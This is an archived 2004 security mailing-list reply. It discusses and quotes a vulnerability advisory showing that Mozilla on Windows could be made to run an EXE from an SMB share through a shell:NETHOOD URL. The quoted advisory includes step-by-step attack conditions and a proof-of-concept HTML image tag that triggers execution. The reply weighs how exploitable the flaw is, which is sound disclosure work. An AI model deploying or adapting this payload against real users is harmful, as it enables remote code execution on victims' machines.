Re: [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program

From: Barry Fitzgerald (bkfsec_at_SDF.LONESTAR.ORG)
Date: 07/09/04

  • Next message: Firstname Lastname: "Re: [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program"
    Date:         Fri, 9 Jul 2004 09:51:06 -0400
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Interesting... I was trying to determine if the shell: exploit could be
    used to execute remote code on a known web server but hadn't approached
    it from the SMB angle.

    The obvious mitigating factor for this exploit is that someone would
    need to have prior knowledge of which SMB shares had been visited by the
    user, or otherwise try to manipulate those. Unless a way to merge this
    flaw with an automated method of placing this shortcut into the nethood
    and controlling what content is on said share -- then this
    vulnerability would almost definately not be usable in widespread exploit.

    It could be a danger in situations where the cracker has prior knowledge
    of the network environment, though.

                    -Barry

    liudieyu@umbrella.name wrote:

    >SUBJ: MOZILLA: SHELL can execute remote EXE program
    >DATE: 2004/07/09
    >FROM: Liu Die Yu <liudieyu AT umbrella D0T name>
    >############################################################
    >[START] Advisory
    >############################################################
    >
    >COPYRIGHT
    >---------
    >This Advisory is Copyright (c) 2004 "Liu Die Yu".
    >You may distribute it unmodified.
    >You may not modify it and distribute it or distribute parts of it without the
    >author's written permission.
    >( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
    >
    >TESTED
    >------
    >MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
    >running on winxp.en.home.sp1a.up2date.20040709
    >
    >PROCESS
    >-------
    >VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED "X-6487ohu4s6x0p".
    >THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER AT
    >"shell:NETHOOD"
    >
    >AT LAST, MAKE MOZILLA REQUEST THE FOLLOWING URL:
    >shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe
    >
    >A FILE NAMED "fileid.exe" IN THE "shared" FOLDER WILL BE EXECUTED.
    >
    >REFERENCE
    >---------
    >MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
    >http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
    >greetingz fly to perrymonj.
    >
    >WINDOWS support "shell:NETHOOD":
    >http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
    >thanks to malware for his additional research , and Cheng Peng Su for his
    >original discovery.
    >
    >
    >
    >liudieyu
    >
    >http://umbrella.name
    >
    >############################################################
    >[START] PROOF OF CONCEPT
    >############################################################
    ><!--
    >MOZILLA REMOTE COMPROMISE DEMO
    >
    >REPLACE "[" WITH "<", and REPLACE "]" WITH ">".
    >
    >!!!!! WARNING !!!!!
    >THIS DEMO WILL NOT WORK WITHOUT PROPER MODIFICATION.
    >
    >PROCESS:
    >1. VICTIM VISITS A SHARED FOLDER NAMED "shared" ON A SERVER NAMED
    >"X-6487ohu4s6x0p".
    > THIS WILL CREATE A SHORTCUT NAMED "shared on X-6487ohu4s6x0p" IN THE FOLDER
    >AT "shell:NETHOOD"
    >2. VICTIM OPENS THIS HTML FILE WHICH EXECUTES A FILE NAMED "fileid.exe" IN THE
    >"shared" FOLDER.
    >
    >CREATED BY:
    >"Liu Die Yu" -> LIUDIEYU at UMBRELLA D0T NAME
    >
    >COPYRIGHT:
    >This Demo is Copyright (c) 2004 "Liu Die Yu".
    >You may distribute it unmodified.
    >You may not modify it and distribute it or distribute parts of it without the
    >author's written permission.
    >( To contact "Liu Die Yu": email: liudieyu AT UMBRELLA d0t NAME )
    >-->
    >
    >[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]
    >
    >
    >_______________________________________________
    >Full-Disclosure - We believe in it.
    >Charter: http://lists.netsys.com/full-disclosure-charter.html
    >
    >
    >
    >

    -----
    NTBugtraq Editor's Note:

    Want to reply to the person who sent this message? This list is configured such that just hitting reply is going to result in the message coming to the list, not to the individual who sent the message. This was done to help reduce the number of Out of Office messages posters received. So if you want to send a reply just to the poster, you'll have to copy their email address out of the message and place it in your TO: field.
    -----


  • Next message: Firstname Lastname: "Re: [Full-Disclosure] MOZILLA: SHELL can execute remote EXE program"

    Relevant Pages